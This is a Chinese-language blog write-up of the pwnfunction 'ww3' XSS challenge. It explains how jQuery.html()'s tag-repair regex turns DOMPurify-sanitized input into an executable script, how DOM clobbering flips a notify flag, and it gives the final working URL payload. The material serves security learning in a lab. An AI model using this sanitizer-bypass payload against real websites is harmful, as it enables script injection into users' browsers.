XSS-Jquery.html()+DOM破坏

已于 2024-08-20 23:01:14 修改
阅读量498 收藏 11
点赞数 16
文章标签: xss 前端
于 2024-08-20 00:37:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78549931/article/details/141288883
版权

目录

靶场网址:​ https://xss.pwnfunction.com/challenges/ww3/ ​

分析代码:

Jquery.html()解析原理:

DOM-clobbering

JS作用域&作用域链

​编辑

靶场网址:​ https://xss.pwnfunction.com/challenges/ww3/ ​

分析代码:

<div>
    <h4>Meme Code</h4>
    <textarea class="form-control" id="meme-code" rows="4"></textarea>
    <div id="notify"></div>
</div>

<script>
    /* Utils */
    const escape = (dirty) => unescape(dirty).replace(/[<>'"=]/g, '');
    const memeTemplate = (img, text) => {
        return (`<style>@import url('https://fonts.googleapis.com/css?family=Oswald:700&display=swap');`+
            `.meme-card{margin:0 auto;width:300px}.meme-card>img{width:300px}`+
            `.meme-card>h1{text-align:center;color:#fff;background:black;margin-top:-5px;`+
            `position:relative;font-family:Oswald,sans-serif;font-weight:700}</style>`+
            `<div class="meme-card"><img src="${img}"><h1>${text}</h1></div>`)
    }
    const memeGen = (that, notify) => {
        if (text && img) {
            template = memeTemplate(img, text)

            if (notify) {
                html = (`<div class="alert alert-warning" role="alert"><b>Meme</b> created from ${DOMPurify.sanitize(text)}</div>`)
            }

            setTimeout(_ => {
                $('#status').remove()
                notify ? ($('#notify').html(html)) : ''
                $('#meme-code').text(template)
            }, 1000)
        }
    }
</script>

<script>
    /* Main */
    let notify = false;
    let text = new URL(location).searchParams.get('text')
    let img = new URL(location).searchParams.get('img')
    if (text && img) {
        document.write(
            `<div class="alert alert-primary" role="alert" id="status">`+
            `<img class="circle" src="${escape(img)}" onload="memeGen(this, notify)">`+
            `Creating meme... (${DOMPurify.sanitize(text)})</div>`
        )
    } else {
        $('#meme-code').text(memeTemplate('https://i.imgur.com/PdbDexI.jpg', 'When you get that WW3 draft letter'))
    }
</script>

可控的输入的点有两个text,img

let text = new URL(location).searchParams.get('text')
let img = new URL(location).searchParams.get('img') 

但是 img作为img标签的src属性被写入,且被过滤了关键符号。

text作为文本被渲染,渲染前都经过一次DOMPurify.sanitize处理

 //part1
document.write(
...
Creating meme... (${DOMPurify.sanitize(text)})
)

//part2 
html = (`<div class="alert alert-warning" role="alert"><b>Meme</b> created from ${DOMPurify.sanitize(text)}</div>`)

notify ? ($('#notify').html(html)) : ''

Jquery.html()解析原理:

乍一看经过DOMPurify后的这些交互点都很安全,但是使用html()解析会存在标签逃逸问题。

两种解析html的方式:jquery.html&innerhtml。innerHTML是原生js的写法,Jqury.html()也是调用原生的innerHTML方法,但是加了自己的解析规则(后文介绍)。

关于两种方式:Jquery.html()和innerHTMl的区别我们用示例来看。

对于innerHTML:

模拟浏览器自动补全标签,不处理非法标签。同时,<style>标签中不允许存在子标签(style标签最初的设计理念就不能用来放子标签),如果存在会被当作text解析。

 因此<style><style/><script>alert(1337)//会被渲染如下

<style>
    <style/><script>alert(1337)//
</style>

对于Jqury.html():

最终对标签的处理是在htmlPrefilter()中实现:jquery-src,其后再进行原生innerHTML的调用来加载到页面。他会对不规范的标签进行修复。

rxhtmlTag = /<(?!area|br|col|embed|hr|img|input|link|meta|param)(([a-z][^/>x20trnf]*)[^>]*)/>/gi

jQuery.extend( {
    htmlPrefilter: function( html ) {
        return html.replace( rxhtmlTag, "<$1></$2>" );
    }
    ...
})

tmp.innerHTML = wrap[ 1 ] + jQuery.htmlPrefilter( elem ) + wrap[ 2 ];

这个正则表达式在匹配<*/>之后会重新生成一对标签(区别于直接调用innerHTML),例如:匹配到<div/>之后,他会修复这个标签,变为:<div></div>

所以我们传入的语句<style><style/><script>alert(1337)//则会被解析成如下形式,成功逃逸<script>标签。

<style>
    <style>
</style>
<script>alert(1337)//

至于这里最后面为何要加两个//:

因为innerHtml会自动补全我们的不规范的标签,这里的style标签少一个,所以就会补全为:<style> <style></style><script>alert(1337)//</style>,而我们的//刚好酒吧最后的style标签注释掉了。

而我们知道DOMPurify的工作机制是将传入的payload分配给元素的innerHtml属性,让浏览器解释它(但不执行),然后对潜在的XSS进行清理。由于DOMPurify在对其进行innerHtml处理时,我们传入的payload是传入到style这个标签里面了,script标签被当作style标签的text处理了,所以DOMPurify不会进行清洗(因为认为这是无害的payload),但在其后进入html()时,这个无害payload就能逃逸出来一个有害的script标签从而xss。

DOM-clobbering

而要想执行我们的payload,只有在notify不为false的时候才能顺利进入html()方法

let notify = false;

document.write(`<img class="circle" src="${escape(img)}" onload="memeGen(this, notify)">`)

const memeGen = (that, notify) => {
        if (notify) {
                html = (`${DOMPurify.sanitize(text)}`)
            }
        ...
        $('#notify').html(html)
}

所以我们需要用DOM破坏来让notify变为true

尝试用DOM-clobbering创造一个id为notify的变量,但是这种方式不允许覆盖已经存在的变量。

不过我们依然可以借助标签的name属性值,为document对象创造一个变量document.notify

JS作用域&作用域链

js的作用域就是会先去判断当前的scope是否有局部变量notify,若不存在向上查找window.document.notify,仍不存在继续向上到全局执行环境即window.notify为止。

所以我们用DOM破坏让name="notify",当它在局部找不到notify时,就会向上查找,最终找到我们覆盖的notify

而我们想要进入html()方法中,还需满足text&&mg这个条件

在当前函数内找不到text和img,onload 的作用域也找不到,就会往上去 script下面找,而多个 script 属于同一个作用域,在script中有text和img,于是就找到了。

而我们想要img为真,必须先执行text中的内容,因为text中有让notidy变为true的代码:DOM破坏将notify覆盖掉,它img中的onload变为真。这样才能满足text&&mg这个条件

<img name=notify><style><style/><script>alert()//

那我们这里就要考虑代码执行顺序的问题了,如果先执行的是img,那我们的payload就不可能成功,原因刚刚讲过了。

而恰好img加载图片是异步加载,所以我们的text中的代码先执行, 然后才会加载图片,然后才会触发onload,而notify为真,就走到html()这个方法中了,就会执行我们的payload。

最终传参:

img=https://i.imgur.com/PdbDexI.jpg&text=<img name%3dnotify><style><style%2F><script>alert(1337)%2F%2F

代码执行成功! 

半ོ糖ོ
关注
  • 16
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
jquery html方法xss,jQuery使用中可能被XSS攻击的一些危险环节提醒
weixin_32657693的博客
07-13 1017
$我们经常使用向 $ 内传入一个字符串的方式来选择或生成 DOM 元素,但如果这个字符串是来自用户输入的话,那么这种方式就是有风险的。先看一个 DEMO:http://jsbin.com/duwuzonife/1/edit?html,js,output$("");当用户输入的字符串是像这样的时,虽然这个 元素不会马上被插入到网页的 DOM 中,但这个 DOM 元素已经被创建了,并且暂存在内存里。...
jquery-1.8.2.min.js
10-27
该版本主要修复之前两个版本中的一些bug和性能衰退问题,包括: Deferred:当typeof( target)=='object'时,Deferred.promise( target)才能正常工作 Event:使用委托事件和伪类时的性能衰退问题 ...
jQuery DOM XSS漏洞
ZPFCD的博客
01-19 1165
JQuery DOM方法中XSS漏洞: <html class=" -webkit- js flexbox canvas canvastext webgl no-touch geolocation postmessage websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow
皮卡丘存储型xssDOMxssDOMxss-x
Fly_Mojito的博客
05-30 1407
皮卡丘存储型xssDOMxssDOMxss-x
jquery html方法xss,jQuery DOM方法中的XSS漏洞演示
weixin_34052529的博客
07-13 545
HTML导入代码模板:XSS vulnerabilities in jQuery DOM methodsInputOutput (native innerHTML)The HTML5 spec states that script tags inserted via innerHTML will not be executed.Injection goes here...Output ($.htm...
domXSS
m0_63306943的博客
03-20 439
domXSS(主要是和js语言进行交互)
jQuery DOMXSS分享
Endeavour的博客
07-17 1016
jquery下载地址:https://code.jquery.com/jquery/ 最近测试公司官网发现,存在domxss,触发效果如下 构造测试payload如下: <script src="https://testtesttest:8443/mss/js/common/jquery-1.11.1.js"></script> <script&...
【应用安全——XSSDOMXSS挖掘
Fly_鹏程万里
02-22 1920
DOM-Based XSS是一种基于文档对象模型(Document Object Model,DOM)的Web前端漏洞,简单来说就是JavaScript代码缺陷造成的漏洞。与普通XSS不同的是,DOM XSS是在浏览器的解析中改变页面DOM树,且恶意代码并不在返回页面源码中回显,这使我们无法通过特征匹配来检测DOM XSS。 0x01 页面跳转 页面跳转中常用的三种方式: 1)302跳转 ...
XSSDOM XSS
大河之犬的博客
05-09 705
当来自攻击者控制的源(如或)的数据不安全地传输到接收端时,就会发生DOM漏洞。接收端是可以执行或呈现有害内容的函数或对象(例如eval()源是攻击者可以操纵的输入,包括URL、Cookie和Web消息。接收端是潜在危险的终点,恶意数据可能导致不良影响,如脚本执行。当数据从源流向接收端时,如果没有适当的验证或清理,就会产生风险,从而可能导致XSS等攻击。常见源location这种类型的XSS可能是最难发现的,因为您需要查看JS代码内部,查看是否使用了您可以控制的任何对象的值。
jquery-1.11.1.js
游海东的技术专栏
07-07 8583
每次想要使用这个js时,总是要到官网上下载,太麻烦,现在把它
JQuery Dom XSS探测.html
05-15
可以直接测试网站里面的JQuery本地弹窗xss,属于渗透测试项一部分,此项目在xss中也属于高危,只需要替换里面的带测试链接即可。
php-jquery-login.zip_Enjoy
09-19
jQuery则是一个JavaScript库,它简化了JavaScript的DOM操作、事件处理、动画制作以及Ajax交互。在登录系统的开发中,jQuery可以用于处理用户输入验证、发送Ajax请求到服务器验证用户凭据、显示反馈信息等。 在这个...
jquery-1.11.1.min.js_javascript_security_
09-29
例如,jQuery的`.html()`方法在插入HTML内容时会进行适当的转义,防止XSS攻击。此外,使用`.val()`来处理表单输入,可以确保数据的正确性和安全性。 然而,仅仅依赖jQuery并不能完全防止所有安全问题。开发者还需要...
jquery-easyui-1.5.1.rar
05-03
jQuery EasyUI 1.5.1与SpringMVC整合详解》 jQuery EasyUI 是一个基于 jQuery前端框架,它提供了丰富的用户界面组件,如表格、表单、对话框、菜单、滚动条等,极大地简化了网页开发过程。在1.5.1版本中,...
xss靶场详解
网安小菜鸡的博客
08-18 780
somebody=在svg加载完成以后执行我们的xss代码。因为这次使用的是innertext,他会把我们的标签整个识别成一个字符串输出就不能用一开始的。因为他利用innerHTML直接更新somebody参数,所以我们可以利用。是一个构造函数,用于动态创建一个新的函数。用于立即调用刚刚创建的函数。方法将字符串中的所有字母。是一个正则表达式,用于。
XSS总结知识点+例题实操
最新发布
代码其实很简单
08-19 742
XSS也是属于注入攻击的一类,他是通过构造一个JS代码,注入到网页中,由用户的浏览器来请求源码且运行达到攻击的效果;2、XSS的危害3、XSS产生的原因4、反射性XSS5、存储型XSS6、DOMXSS8、XSS的防御及修复9、XSS很多时候就是一边测试性的输入一边查看html源码,可以通过查看源码查看系统对我构造的js注入做了什么防御;10、XSS的绕过2、DOMXSS --向源html码中插入代码,破坏DOM因为我们js中也有tel,cid等这些关键字/函数,那么当你在前端用这些关键字/函数的时候
XSS-过滤特殊符号的正则绕过
2301_78549931的博客
08-17 903
结果为数字8680439也就是说我们利用parseInt函数将关键字变为一串数字,但数字肯定无法运行,我们还需要再变回去,要将一个数字转换为特定的。
XSSDOM破坏
m0_67441173的博客
08-17 898
@keyframes x{}
jquery-1.11.1.js漏洞修复
05-20
jQuery 1.11.1 已经很老了,如果您正在使用它,建议升级到最新版本。如果您不能升级,可以尝试以下方法修复漏洞: 1. 防止跨站脚本攻击(XSS):在使用 jQuery 的时候,应该使用 jQuery 提供的方法来处理 HTML 字符串,而不是直接拼接字符串。例如,使用 `$(element).text()` 替代 `$(element).html()` 来插入文本内容。 2. 防止操作 DOM 元素时,传入非法参数:在调用 jQuery 提供的 DOM 操作方法时,应该确保传入的参数是合法的,例如,不应该传入空字符串或者无效的选择器。 3. 防止 JSON 数据劫持:在使用 jQuery 的 $.getJSON() 方法请求数据时,应该确保返回的 JSON 数据是可信的,不要轻易相信用户传入的 JSON 数据,应该对返回的 JSON 数据进行验证和过滤。 4. 禁用 eval 函数:在调用 jQuery 的 $.ajax() 方法请求数据时,应该禁用 eval 函数,以避免可能的安全漏洞。 总之,除了及时升级到最新版本,还需要注意代码编写中的安全问题,以保证 jQuery 应用的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值